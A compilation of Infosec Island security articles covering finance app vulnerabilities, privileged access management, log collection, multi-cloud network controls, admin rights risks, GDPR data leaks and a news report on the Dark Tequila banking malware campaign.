To understand the current security state of fintech apps, researchers at SEWORKS downloaded and analyzed the top 20 free Android finance apps on Google Play in popular categories such as mobile banking, payments, investments, budgeting, trading, credit and expense tracking and other financial categories.
What we discovered, unfortunately, was not unexpected.
Analyzing top Android mobile banking apps
SEWORKS researchers employed both dynamic and static testing methods to conduct more detailed analysis on app vulnerabilities even when they run.
All of the finance apps had properly secured native libraries and data encryption, which is a positive sign that companies care about adding security measures and protecting the data and users.
However, our analysis uncovered five critical and medium vulnerabilities in the free Android finance apps on Google Play:
- 100%: File input/output or I/O. Level – critical. Data transfer to or from the application file system can serve as an entry attack point, such as when financial statements or tax forms are downloaded or budgets updated. Malicious code injected into the app can allow malicious attackers access to resources such as users’ account numbers, passwords or routing numbers. Hacking attacks via file I/O can be executed internally and/or by using network behaviors to activate a backdoor with a connected network.
- 100%: Network behaviors. Level – medium.Hackers can potentially exploit vulnerabilities within the server-client communication, such as when users access account balances, transfer funds, or perform other activities. For example, a man-in-the-middle (MITM) attack, where the attacker secretly relays and possibly alters the communication, can occur if an app’s authentication protocols and certification pinning is incorrect.
- 100%: Code tampering. Level – medium.Listed as one of the Open Web Application Security Project (OWASP)Mobile Security Project’s Top 10 Risks, it is considered one of the most common app vulnerabilities and one of the easiest to manipulate. By changing or replacing code, an application can be exploited for various types of attacks, such as inserting malware or phishing.
- 30%: Secure Sockets Layer (SSL).Level – critical. Vulnerabilities related to a broken or a link between a server and client that is not properly established and encrypted could leave sensitive financial data vulnerable.
- 5%: DEX file exposure. Level – critical. A relatively small numberof the apps had vulnerabilities related to the Dalvik Executable file (.DEX) containing the app’s Java bytecode. Code decompiled to expose the original source code could lead to malicious hacking attacks, such as piracy and malware injection.
The result of our analysis of mobile banking apps is similar to what we’ve uncovered in the m-commerce and fitness markets – all apps are subject to hacking attacks.
All of the finance apps we studied had at least one critical vulnerability, as well as medium and low security risks. We recommend adding security starting from the app development phase and testing often to ensure the app security status is up to date. It is also important to encourage the infosec team to maintain security protocols. Certainly, apps that handle our finances must have a comprehensive level of security.
About the author: Min-Pyo Hong has advised corporations, NGOs, and governments on digital security issues for over 20 years, and led a team of five-time finalists at Defcon. Hong is currently founder and CEO of Seworks, a San Francisco-based developer of advanced security solutions for the mobile era.Copyright 2010 Respective Author at Infosec Island
The growing need to secure the “keys to the kingdom” and the steps organizations need to take to protect their critical credentials
The constantly evolving threat landscape continues to bring organizations — even of enterprise size — to their knees by means of massive data theft. Billions of records are stolen each year, identity theft is rising and the financial fraud market is expanding.
These consequential concerns turn executives’ stomachs, resulting in increasing involvement from business leaders in cybersecurity. The fear of breaches, climbing costs and restrictive requirements to meet compliance standards and maintain security are major hindrances to these organizations. They need a solution to address these problems.
It is broke, and it’s time to fix it
Traditional cybersecurity strategies are no longer sustainable. Old products and methods are too complex, challenging to integrate, usually difficult to manage and cost organizations too much time and money. These organizations have little choice but to progress to simpler solutions that alleviate complicated protocols for IT teams and offer seamless integration while constructing a more secure defense system.
Privileged access security has become one of the top IT concerns — many Chief Security Officers (CSOs) and Chief Information Security Officers (CISOs) are prioritizing it to greatly reduce the risks of cyberattacks by protecting their organizations from unauthorized access. Recently Gartner released a report that Privileged Access Management is the No. 1 security project to implement in 2018.
One of the most common and yet daunting challenges for CSOs and CISOs is figuring out where to begin — where to first focus resources, how much funding to allocate, etc. The initial action should be to secure critical credentials, shutting down a go-to attack vector for hackers.
Organizations should start by evaluating their privileged accounts, determining what privileged access means to them. Since each company is different, it is important to map out which important business functions rely on data, systems and access. A recommended approach would be to reuse your disaster recovery plan which typically classifies the important systems that need to be recovered or addressed first and identify the privilege accounts for those systems.
Generally, privileged access includes permissions for critical infrastructure, sensitive data, configuring systems, patch deployment, vulnerability scans, and more. In order to create a comprehensive and specific definition, each organization should perform a data impact assessment which would illustrate exactly what the most privileged accounts are protecting in order to access or enable access to sensitive data.
Privileged accounts are everywhere in the IT environment. They are they glue that connects vast information networks. Yet for most people they are invisible.
These accounts can be accessed and operated by humans or non-humans. Some privileged accounts are associated with individuals such as business users or network administrators. Some are application accounts used to run services and are not associated with a person’s unique identity.
Once a data impact assessment is complete, the next step toward a mature security strategy is to follow the Privileged Access Management Lifecycle to get you moving quickly on the path to protecting and securing privileged access.
Privileged Access Management Lifecycle
Just as with any security project that is designed and implemented to help protect critical information assets, managing and protecting privileged account access requires a continuous approach. Organizations need to employ an ongoing program to pair with an advanced deployed strategy. The following briefly details the Privileged Access Management Lifecycle model which provides a high-level roadmap for establishing a premium PAM program.
Define and classify privileged accounts. Once your organization has established its qualifications for privileged accounts, it needs to develop IT security policies that explicitly cover them. Many organizations still lack acceptable use guidelines for privileged access. Treat privileged accounts individually by clearly defining a privileged account and detailing acceptable use policies. Gain a working understanding of who has privileged account access, and when those accounts are used.
Discover your privileged accounts. Organizations should use an automated PAM software to identify their privileged accounts and implement continuous discovery to prevent privileged account sprawl, identify potential insider abuse, and reveal outside threats. This helps ensure complete and continuous visibility of the privileged account landscape which is crucial in combating cybersecurity threats.
Manage and protect privileged account passwords. Proactively supervise and control privileged account access with password protection software. Your solution should automatically discover and store privileged accounts; scan individual privileged session activity; schedule password rotation; and examine password accounts in order to quickly detect and respond to malicious activity.
Limit IT admin access to these critical systems. Develop a least-privilege strategy so that privileges are only granted when required and approved. Enforce least privilege on endpoints by restricting end-users configured to a standard user profile and automatically elevating their privileges to only to run approved and trusted applications. For IT administrator privileged account users, you should control access and implement super user privilege management for Windows and UNIX systems to prevent attackers from running malicious applications, remote access tools, and commands. Proper PAM solutions offer least-privilege and application control to enable seamless elevation of approved, trusted and whitelisted applications while minimizing the risk of running unauthorized applications.
Monitor and record sessions for privileged account activity. Your PAM solution should be able to do this for your organization. This enforces proper behavior and helps avoid end-user errors because the activities are being supervised. If a breach does occur, monitored privileged account use also provides information to forensics teams to assist in identifying breach causes as well as provides intelligence toward reducing future risk exposure.
Detect usage and analyze behavior to comb for abnormalities. Gaining insights into privileged account access and user behavior is a top priority as 80 percent of breaches involve a compromised user or privileged account. Real-time visibility into the access and activity of these users will allow you to detect suspected account compromise and potential insider threats. Behavioral analytics use data to establish individual user baselines, such as user activity, password access, and time of access. This information is used to identify unusual or abnormal activity in order to predict threats and alert IT teams when they occur.
Respond to incidents effectively by preparing an incident response plan in the case of a privileged account compromise. When an account is breached, changing the password or disabling the account is dangerously ineffective. If penetrated and compromised by an outside attacker, the assailant(s) can install malware and even create their own privileged accounts. If a domain administrator account is taken over, you should assume that your entire Active Directory is vulnerable.
Review and audit privilege account activity. Repeatedly analyze privileged accounts use through audits and reports to identify unusual behavior that may indicate a breach or misuse. A proper solution’s automated reporting will help track the cause of any security incidents and comply with industry and government regulations. Auditing of privileged accounts will also provide cybersecurity metrics to show other executives quantified information to make better informed business decisions.
Protection Begins Now...
The formula for establishing PAM security requires an understanding of privileged accounts, adoption of a comprehensive approach (such as the Privileged Access Management Lifecycle model), adherence to compliance standards and a multifaceted solution that offers true protection for the “keys to the kingdom.”
About the author: Joseph Carson is a cyber security professional with more than 20 years’ experience in enterprise security & infrastructure. Currently, Carson is the Chief Security Scientist at Thycotic.Copyright 2010 Respective Author at Infosec Island
The most significant costs in security operations come from an unlikely source – missed opportunities caused by not collecting and organizing log data. In order to operate more efficiently, security operations need to collect more data to support not just detection but validation, impact analysis and response. Reviewing the data used in security operations shows that all data, not just security logs, are needed to operate efficiently.
In 2018, Ponemon’s Cost of Data Breach Study states that the average total cost of a breach ranges from $2.2 million to $6.9 million, depending on how many records are compromised.. And keep in mind, this is just the cost impact of a breach without regard for numerous other security issues. Efficient security operations save millions for the average mid to large sized company.
Back in 2005, in a conference room on the outskirts of Paris, Peiter Zatko, better known as Mudge, was explaining to me what he called the Physics of the Internet. It wasn’t physics, but the unwritten rules of how the flows of people and processes behave on the Internet. My wife leaned over and told me he was babbling incoherently. I leaned back and told her, “It is brilliant.” At that moment, I was listening to the first person to try and apply user behavior analysis to security. He was babbling— looking for any analogy to express his idea: and few understood the significance at the time.
I would follow Peiter on stage and speak about the scalability of detection analysis. I remember how awkward it was to quote Peiter while he sat in the audience. He had said the year before, “You will never pay me to review audit logs.” That is, the smartest people in cybersecurity are not doing the tedious work, as they are far too engaged with more interesting projects.
Since then, Peiter has continued on from one engaging project to the next, and I continue to stew over the efficiency of security operations. The problem is that with limited talent, how do we review all the logs correctly? The answer has always been training more people and reducing log sizes.
Here lies the greatest failure of operational security: Less is not more— less really is less. Less data means less vision. This means less alerts, less validation data, less information with which to assess impact, and less data to respond. This begins to impact cost because events are missed and additional resources are spent obtaining data elsewhere when an organization must detect and respond without adequate data. Missed events and insufficient data for response far outweigh the costs of saving more.
We all know data is valuable. Facebook has built a business on that principle. At my company, we don’t consider ourselves trash collectors of log data, but the waste management team. We create value from all that trash.
All of us are literally surrounded by data in today’s world. And it’s useful in more ways than one would ever imagine. As we see companies collecting more and more data every day – and spending more money to understand it – we know the industry is finally coming to realize that all data is security data.
In the past, organizations, their IT departments, and especially their security vendors, cherrypicked the data they considered to be significant for security threat management. The 1990s and early 2000s saw the rise of security information and event management tools (SIEM’s), marketed as a tool to gather and provide access to the data causing vulnerabilities within an infrastructure. However, even though shifting perceptions fully will require more work, our modern understanding of what defines security data is completely different from when SIEM’s reigned supreme. Back then, truly massive data logs were quite rare. Not everything collected was deemed important enough to keep, let alone analyze.
In those days, most focused on prevention to address scaling response. But as our understanding of security data evolves, it’s become more apparent that allowance is the real issue.
When we enable full logging on a firewall, the logs mostly consist of allowed data flows—about 85%, given how firewalls handle UDP traffic. Blocked data are considered to be “completed,” or already addressed events. As previous security breaches have demonstrated, successful attacks will occur within allowed data flows, not blocked events. Organizations are beginning to understand this, and we see this reflected in the unraveling definition of security data.
Think about it – from the data an employee is accessing to their request to access that data can be considered security data… and that’s just the beginning. Mobile data, social media data, location data, geographical data, utilities data— you name it, and it can profoundly impact an organization’s security operations or even law enforcement.
In the days of handpicking data deemed important to security, the scope of relevant data was narrow and static. Now, as the internet expands into our countless devices, appliances and vehicles, we’re opening the door to an era where these standards don’t exist, and everything has its own name. This will need to change. Data created by developers’ apps and programs isn’t currently recognized as security data, yet it absolutely is. Even the data that your refrigerator or your phone or your camera wants to share with you – none of that data is labeled as security data, but it all is.
Look at cameras on the street. Everyone is walking around with a camera in their pocket. There are ATM cameras, gas station cameras, hotel hallway cameras and FedEx cameras. Regardless of the intent of the camera, they have all provide law enforcement with video information, GPS information, and phone call metadata, all of which is being used to solve crimes. When the device began generating data, it certainly never knew its eventual use.
Still, this paradigm shift isn’t happening quickly enough. Report after report indicates that organizations don’t trust their current security solutions to prevent attacks. As the number of successful cyberattacks increase, so do companies’ costs. Any idea why? It’s nearly always associated with the amount of data collected, and the use of outdated solutions that weren’t intended to store a day’s worth of modern data collection, let alone a year’s. Using a solution that’s not designed for today’s ongoing, huge scalability needs is akin to a choking problem that only gets worse and requires increasingly expensive doctor visits that just never seem to get you healthy.
Business is about efficiency. Business competition is harsh, and it doesn’t care if you buy name brand solutions. Companies that collect and understand their data efficiently will perform fewer downstream actions and spend less money.
About the author: Chris Jordan is CEO of College Park, Maryland-based Fluency (www.fluencysecurity.com), a pioneer in simplified log management and security analytics.Copyright 2010 Respective Author at Infosec Island
The modern public cloud landscape offers a world of possibilities. The major cloud services (Amazon Web Services [AWS], Azure and Google Cloud Platform [GCP] provide robust solutions with an ever-growing list of services and features. Today 81 percent of organizations leverage multiple cloud service providers (CSPs).
The reasons for adopting a multi-cloud strategy can vary: organizations may build disaster recovery (DR) sites on a different cloud platform or divide workloads according to the most suitable cloud services, and sometimes multi-cloud security is the product of mergers and acquisitions. No matter how or why multi-cloud was introduced, securing multiple cloud platforms is challenging.
Cloud vendors are in a race to close the gaps in capabilities among themselves as well as to create product differentiation that will attract and retain customers. Their security services are evolving rapidly to offer powerful functionality across different security areas, but they are doing so in variety of ways. Some services may look similar, but minor differences can lead to security issues and misconfigurations. Let’s explore some of the challenges that security organizations face with multi-cloud deployments.
Different vendors, different account models
The first challenge starts at the beginning – each cloud vendor provides a different account management model. Security organizations often need to map resources to owners of the relationship with the cloud vendor. To do this, they must understand the correct permissions model they need to apply. When heterogeneous CSPs are used, this task becomes even more challenging.
GCP is based on projects. Any GCP resource must belong to a project. Projects are placed in folders, and multi-level folders are supported.
While these different concepts are related, subtleties that can impact security still exist. To understand the resource hierarchy, it is important to understand which security model to apply.
Controlling security groups on different platforms
IT engineers have decades of experience with private networks. But while in the physical Domain Controller (DC) they control everything, starting from the wires all the way up to the application, in the cloud it is Amazon, Microsoft and Google that control the physical layer and invent different services that run on top of the virtual network. Routing models used by cloud solutions differ from those used by the DC, and different cloud solutions use different models. The network firewall from the DC is embedded into the infrastructure as Security Groups (SGs), and there are some differences among the SGs.
The AWS SG includes inbound and outbound rules for traffic. These rules are permissive, so effectively they work as a whitelist. Users can attach multiple SGs to each Elastic Compute Cloud (EC2) instance (technically, to the Elastic Network Interface, or ENI), and the rules of each security group are effectively aggregated to create one set of rules. SGs can be applied to different entities, including instances or managed services such as load balancers.
Azure Network Security Groups (NSG) and Google Elastic Compute Cloud (GCP) SGs provide an experience closer to classic firewalls, holding lists of allow and deny rules. The order of the rules is significant; rules with higher priority control the decision to allow or deny traffic. Azure allows only a single NSG to a virtual machine (VM), and NSGs can also be applied to subnets or the network interfaces (NICs) attached to VMs. GCP Security Groups are based on tags, which allow attaching rules to assets such as a VM.
When building the network, it is critical to keep in mind the need to implement the right model. Setting the wrong rule priority in Azure can lead to traffic being accepted by mistake. Applying additional SGs to a VM in AWS can lead to accepting traffic that was denied by the original SG. Engineers who work primarily with AWS can change priority-of-deny rules and block access to the service (or, in other cases, expose the service to the Internet when it should not be). Configuring security requires the right mindset, and IT engineers shifting back and forth among different deployments can easily make mistakes.
Virtual Networks in the cloud have different behavior
We can go one level deeper into the network. AWS virtual private cloud (VPC) subnets can either be private or public; a subnet is public if it has an internet gateway (IGW) attached. Only public subnets allow resources deployed in them to access to the internet. Azure VNet does not have private or public subnets; resources connected to a VNet have access to the Internet, by default. An engineer who is used to AWS relies on it to block instances from accessing the internet. When creating a DR site on Azure, however, the engineer needs to deny internet access. Context switching issues can be hazardous.
Another complication in AWS networking is related to the Network Access Controls (NACLs). NACLs operate at the subnet level by examining traffic entering and exiting the subnet, while SGs operate at the VM (actually – the Elastic Network Interface) level. NACLs are stateless – meaning even if ingress traffic is allowed, a response is not automatically allowed unless explicitly allowed in the rule for the subnet. The following diagram provided by AWS explains the flow of traffic across different security layers.
Azure and GCP do not use the concept of NACL, so engineers who migrate from those platforms to AWS often find themselves puzzled as to why traffic is blocked, even if it is clearly allowed by the SGs.
A few recommendations
The examples we have explored are only a taste of the real experiences and challenges that multi-cloud solutions bring to us. Becoming an expert with one cloud platform takes a lot of time and working with multiple clouds at the same time is more difficult and can make teams prone to errors. To reduce risk, you can follow a few recommendations:
- Automate processes. Manual changes are prone to errors; automation can reduce the chance of making mistakes.
- Employ a cross-cloud system. A solution that provides a level of abstraction and a similar experience across different cloud platforms can eliminate context-switching issues.
- Adopt a change-review mechanism.
About the author: Zohar Alon is the Founder and CEO of Dome9 Security, and a veteran in networking security. He helped shape the early days of network security while at Check Point Software where he built Provider-1,Copyright 2010 Respective Author at Infosec Island
All threat actors will know that the day they gain access to an account with full administrative rights, they’ve hit a goldmine. It only takes one weak endpoint for an attacker to have free reign over an entire corporate network. The 2016 Forrester Wave on Privileged Identity Management revealed that 80 percent of all data breaches involve the use of privileged credentials in one way or another. As cyber risks continue to evolve, understanding the risks associated with full admin privileges and limiting the unnecessary use of them is essential for organisations of every size, in every sector.
Reducing administrator rights should form the foundation of any organisation’s security strategy or processes to ensure secure access to system controls. Yet many companies are still not putting appropriate measures in place to counter the threat, purely due to the lack of understanding around the risks of over-privileged accounts. Therefore, it is vital for organisations and employees to be aware of some of the common ways that full administrator rights can pose a threat to security.
Access all areas
To put it simply, when user accounts have admin rights, it enables the end-user to install new software, add accounts and change the way systems operate. It also allows users to own any file on the network – privileges always beat permissions. From there, admin users can change ownership of relevant documents or folders and either restrict access, copy or transfer sensitive data without other authority, or potentially alter protected security policies.
With the help of direct access and change specific registry keys, admin rights allow users to navigate around Group Policy Object settings and other in-built central management policies. By having the freedom to create new accounts and set privilege levels, any compromised local administrator account could be opened up to both malicious users and their accomplices.
Once you’re in, you’re in
Once a malicious individual gains access to a user’s desktop, they can turn their attention to widening the net and compromising an entire corporate network. Malicious users will have full reign and access to any part of the operating system or network, but can also lay traps for users with higher privilege, such as domain admins, to provide further access to highly-sensitive data.
Having unrestricted admin rights in place, therefore, poses a significant risk of privilege escalation attacks and lateral movement. The ability to manage certificates for a local machine means admin users – or those impersonating them – also risk exposing others to phishing and man-in-the-middle attacks. By installing a fake certificate authority, malicious users can trick others into believing they are visiting trusted sites or receiving information from a trusted source, which could lead to sensitive information being leaked, or the installation of malware that could infect an entire system.
The use of port scanning tools, often used by businesses to capture network traffic, serve as an easy target for those looking to take advantage of vulnerabilities within a network. But when this privilege falls into the wrong hands, it also allows malicious users to identify and exploit key weaknesses in the corporate system.
Gone without a trace
The threats that come from admin rights aren’t all external – employees can also pose a danger to themselves and the organisation. The freedom to install, update or remove any application or software can inadvertently leave the IT environment open to vulnerabilities. End users do not necessarily know the full implications of their actions, and this lack of awareness can pose a serious risk to system stability and data security.
For example, applications can be configured to run bypassing User Account Control protocols, while processes can be run as System too, meaning that malicious software can be embedded and set to trigger in future, running in the background to existing applications.
The ability to make any changes within an IT system offers cyber-criminals the ability to cover their tracks in cases of misdemeanor. They can delete applications, system and security event logs to cover up any wrongdoing with relative ease – leaving organisations completely clueless about how their business and sensitive information was compromised.
Whichever way you frame it, once a hacker finds a way to infiltrate an endpoint with full administrator privileges, they can very easily cast their net much further and bring down an entire network if they please. The best ones out there can even remain undetected.
According to Gartner Vice President and Distinguished Analyst Neil MacDonald, privileged account management should be one of the top priorities for CISOs when it comes to security.It’s important that IT leaders balance this whilst empowering users to complete their work efficiently. This is where restricting the privileges of your users can play a crucial role. Having a culture and awareness around the cyber threats alongside least privilege will mean that organisations can strengthen their security posture, without limiting the agility of day-to-day operations. Understanding the positive effect, this can have is a must. Implementing least privilege will protect what’s most valuable to organisations – its reputation and the compromise of sensitive data.
About the author: Andrew has been a fundamental part of the Avecto story since its inception in 2008. As COO, Andrew is responsible for Avecto's end-to-end customer journey, leading the global consultancy divisions of pre-sales, post sales and training, as well as customer success, support and IT.Copyright 2010 Respective Author at Infosec Island
We have seen disruptions affect every industry during the last millennia. From chemical photography to digital photography, from horse drawn carriages to supersonic flight, from shovels to hydraulic excavators, from the telegraph to the telephone and of course from manual computation to modern computers and smart phones which brings rise to the likes of Uber, Facebook, Twitter, etc. for even more disruptions.
So, why is it that we tend to scoff when a cyber security disruption is brought to our attention?
Effective Cyber Protection
Is good really good enough when your productivity, profitability and corporate reputation is at stake? What defines effective? At one point if we could detect a signature and prevent future occurrences it was considered effective. Then the introduction of behavior-based technologies like sandboxes allowed for the detonation of malware in secure, quarantined areas so that production environments would not be affected.
Even new approaches, such as Content Disarm and Remediation (CDR), provide variations on existing well known (and spoof-able) approaches. So, by definition, the only truly effective cyber protection solution is one that can prevent zero-day malware without the need for long delays or costly resources.
Evolving to Disruption
Content, whether through datafiles or data streams, is one of the most common and pervasive methods by which malware infiltrates an enterprise. Current security approaches cannot ensure that incoming network-based content is free of malware because they fail to identify, let alone prevent, zero-day malware and unknown threats hidden in content. Moreover, such approaches are resource intensive, slow and evadable - all of which affect an enterprise’s bottom line and profitability.
What is needed today is evasion-proof, instantaneous, end-to-end security for any kind of network based non-executable content for a variety of persistently used attack vectors such as email, web, and cloud file sharing applications. Put more simply, we have been evolving various security techniques but are now at a crossroad where only disruption will deliver the impact necessary to truly prevent versus having to remediate cyber threats.
Modern Cyber Protection
To be truly modern, your cyber prevention solution should deliver instantaneous end-to-end security for any kind of network based non-executable content for a variety of persistently used attack vectors such as email, web, and cloud file sharing applications, challenging the norms that rely on slow, costly and mostly outdated, ineffective methods of sandboxing, signatures and behavioral inspection.
Really – it’s quite simple: executable code in any type of non-executable content such as datafiles and datastreams is malware, and therefore should not be permitted to enter any organization. At the bottom of it all, the solution should know whether content is either infected (quarantined) or it is not (clean). There should be no behavioral analysis or guesswork, so you can prevent cyber threats instead of remediating the damage.
Organizations should consider a solution that applies to protection against malware in active content and file-less malware as well. Active content such as macros should be de-obfuscated no matter the level of nesting or encryption and evaluated to determine its true purpose. Malicious scripts, links and URLs that may be hidden, self-extracting or even on remote servers should be instantaneously analyzed and determined to be clean or not.
At the end of the day, companies need to look for a solution that strengthens their cyber defenses dramatically by preventing attacks before they enter and harm their organization, their customers and their brand. Remediation is costly, prevention is not.
About the author: Boris Vaynberg co-founded Solebit LABS Ltd. in 2014 and serves as its Chief Executive Officer. Mr. Vaynberg has more than a decade of experience in leading large-scale cyber- and network security projects in the civilian and military intelligence sectors.Copyright 2010 Respective Author at Infosec Island
Companies today have a huge task on their hands with the sheer volume of red tape to demonstrate compliance. Such is the global nature of today’s regulations that most organisations must adhere to them even if they are not physically in the markets covered. This is exposing them to greater compliance risk than ever before.
What makes regulatory compliance even more complex is that there is no ‘one-size-fits-all’. Each regulation has a different focus, with different rules aligned to its individual purpose, sometimes with conflicting requirements. For example, financial institutions must comply with anti-money laundering (AML) and fraud regulations involving strict controls on transaction reporting. Yet AML compliance must be in line with GDPR which focuses on the capture, using, securing and discarding of customer personal data.
However, leaving the question of fines for non-compliance aside for a moment, the ultimate purpose of these regulations is not to increase workload, but assure data is reported accurately, protect it from inappropriate use and to identify possible illegal activities. Unfortunately, many companies first find out that they are not adequately managing and/or protecting their data before a visit from the regulators – rather when they experience a data breach.
The impact of a data leak
The time period for businesses to disclose a data breach have been squeezed thanks to GDPR. Instead of waiting until two years after a breach, as had seemed an uncomfortable norm, under GDPR, companies now have only 72 hours to report the event to the affected individuals (they must report to supervisory authorities as soon as they know a breach has occurred). This three-day turnaround means businesses must be much more on the ball in terms of knowledge of their data inventory and security systems.
When data leaks occur without public disclosure, severe financial and reputational consequences can occur when the breach is finally disclosed, and they always do. Take, for example, the Yahoo breach and the Facebook/ Cambridge Analytics debacle, which, while not a breach, involved questionable handling of private data.
Between 2013-2014, almost three billion Yahoo user accounts were affected in a hacking attack, making it the largest data breach in history. And yet, it took over two years for the Internet firm to divulge the occurrence. The impact of the breach was significant to Yahoo’s reputation, costing the company real money. Not only did they face a $23 million fine by the SEC but the incident also threatened its acquisition by Verizon, who cut the deal by $350 million.
While Yahoo’s data breach was caused by security flaws, this year’s Facebook/Cambridge Analytics scandal shows the potential damage when the use of data cascades out of control. While a complicated story, it involves the unauthorised use of personally identifiable information of up to 87 million Facebook users. While the data was harvested through permissions given by a third-party quiz, questions were raised about how the data was provided to Cambridge Analytica and what rights they had to use it.
Facebook’s share price dropped 8.5% and, more importantly, polls showed a 66% drop in consumer confidence in Mark Zuckerberg who was subjected to US Congressional and EU scrutiny and agreed to a wide range of changes to Facebook policies and practices. Just 28% of the Facebook users surveyed after Zuckerberg’s testimony believed the company is committed to privacy, down from a high of 79% just last year.
The lesson is that the entire extended data supply chain must be carefully managed. An organisation must know the location of the data, if they have the right to use it, afford the requisite level of protection, be immediately aware when it has been breached and know the population of individuals affected. The institution must also know where their data flow and track it to ensure it is not subjected to improper or disallowed use. If an organisation fails to manage its data along this complete journey, the regulators will be the least of their worries.
Fines are, after all, typically a one-time event – and a successful company can often quickly recover from the financial setback. Reputational damage is different, since it has significant public exposure, and especially when customers lose their trust in a brand the result is an impact to the company financially in the long run – not just directly through loss of business, but also through a drop in market value.
Businesses, large and small, are the custodians of customer data, not the owners. GDPR clearly enforces that the individual owns their data and controls its use. This means businesses must look after what is only lent to them and treat it as carefully as any other corporate asset. In other words, they must keep it safe and secure. Just think, if you were the proprietor of a bank or vault, you would not let just anyone walk in. Instead, you’d have the proper security checks in place to make sure the right people get the right information. This same mindset must be also applied to data - whether that is transactional records or a customer’s personal information.
Of course, this is not a straightforward thing to do. Trying to understand the complex nature of how data travels across an organisation’s diverse number of platforms, services, movement outside the organisation, and how data interacts with third-party web services and APIs can be an overwhelming task. The process is necessary in order to put in place the basic recording, inventorying and reporting processes in order to maintain compliance over time.
Technology is not only helpful in this process – it is essential to achieving and maintaining compliance. Automated discovery and data lineage creates and maintains transparency into processes and the data being managed. Reporting supports an “audit ready” position so supervisory authority inquiries can be answered without a fire drill while data intelligence change detection prevents new problems from sneaking in.
Many companies are finding that a data catalog will ensure that any user can easily access and use data as needed. A software-driven or intelligent data catalog can locate even the most complex data within a data estate, ready for analysis and decision making. This will enable users to spot personal information amongst new data and a data lineage version comparison alerts them to changes in how that personal data is handled.
What data a company chooses to collect, store and discard very much depends on the sector in which they operate. However, there are some steps that almost any company can take such as capturing the information only directly related to your product or service and keep it in a limited number of databases. It is also wise to scope out how much of the data needs to be safeguarded.
When it comes to specifically storing sensitive data, simple actions like avoiding generic passwords and applying guardrails is crucial. If in place, the Data Protection Officer must oversee the process of reporting on personal data - or personally identifiable information - that show the data an organisation is responsible for - including recording and classifying protected data in the glossary so that the users know what they can and can’t do with it.
Technology solutions such as Data Intelligence can go a long way to providing peace of mind here. Intelligent Data Analysers examine data and metadata to promote comprehensive understanding, including detailed automated data lineage for insight at a deeper level. Out of the box reports assist with GDPR compliance, offering a GDPR inventory dashboard and a set of reports summarising Privacy Impact Assessments (PIAs). These and process maps that show how protected data moves through the organisation are critical to data security and compliance. These can show where data is vulnerable and if and how it moves to outside processors or outside protected areas. The company will need to record that protections are in place through model agreements and binding corporate policies.
Today’s reliance on data to fuel predictive analytics means businesses believe there is value in keeping data lakes for future business goals. However, on the whole, they need to become better at discarding what is not necessary and GDPR helps by being very specific about when information is supposed to be deleted.
Data leaks, intentional or unintentional, happen. Whether it happens depends on how proficient the team is at reducing the risk. Failure to do so, as we’ve seen in this piece, means they may just find themselves having to prove what measures were taken to secure information to authorities and fend off the adverse side effects of data leaks, such as damage to customer loyalty and financial penalties.
About the author: Jesse Canada is an Enterprise Data Management practitioner with over 20 years in diversified financial services experience working with prestigious institutions (RBS, Citizens Bank, Citibank, and Bank of America), non-profits, and consulting services.Copyright 2010 Respective Author at Infosec Island
A series of cyberattacks attempting to steal financial information and login credentials from Mexican users, that hve been ongoing for at least five years, Kaspersky Lab says.recently discovered complex malicious campaign has been
As part of the campaign, the attackers deliver a multi-stage payload to their victims, but only if specific criteria are met. For example, no infection is performed if a security suite is installed on the victim’s machine or if the malicious code detects it is being executed in an analysis environment.
Dubbed Dark Tequila, the malicious campaign targets the customers of several Mexican banking institutions, but also attempts to compromise login credentials to popular websites, including code versioning repositories and public file storage accounts and domain registrars.
According to Kaspersky, some comments embedded in the code were written in the Spanish language and use words only spoken in Latin America, suggesting that the threat actor behind it is Spanish-speaking and Latin American in origin. The attackers use spear-phishing and infected USB devices for infection.
“The threat actor behind it strictly monitors and controls all operations. If there is a casual infection, which is not in Mexico or is not of interest, the malware is uninstalled remotely from the victim’s machine,” Kaspersky explains.
Both the Dark Tequila malware and the infrastructure used as part of the campaign are highly sophisticated compared to typical financial fraud operations, the security firm reports.
“At first sight, Dark Tequila looks like any other banking Trojan, hunting information and credentials for financial gain. Deeper analysis, however, reveals a complexity of malware not often seen in financial threats,” said Dmitry Bestuzhev, head of Global Research and Analysis Team, Latin America, Kaspersky Lab.
The malicious implant has a modular design and contains all of the components needed to perform the malicious operation, with the attackers being able to decrypt and activate different modules remotely. The stolen information is sent to the attackers’ server in encrypted form.
A total of six modules were observed being used in this campaign. The first module is responsible for communication with the command and control server, while the second cleans up the system if virtualization or debugging tools are detected.
The third module acts as a keylogger and can steal information from various banking sites, flight reservation systems, Microsoft Office 365, IBM lotus notes clients, Zimbra email, Bitbucket, Amazon, GoDaddy, Register, Namecheap, Dropbox, Softlayer, Rackspace, and other services.
The fourth module is an information stealer that targets saved passwords in browsers and email and FTP clients, the fifth is a USB infector that copies an executable file to a targeted removable drive (thus allowing the malware to move offline, like a worm), while the sixth module is a service watchdog that makes sure the malware is running properly.
“The code’s modular structure, as well as its obfuscation and detection mechanisms, help it to avoid discovery and deliver its malicious payload only when the malware decides it is safe to do so. This campaign has been active for several years and new samples are still being found. To date, it has only attacked targets in Mexico, but its technical capability is suitable for attacking targets in any part of the world,” Bestuzhev added.
Related: Evasive Malware Now a Commodity
Related: Necurs Campaign Targets BanksCopyright 2010 Respective Author at Infosec Island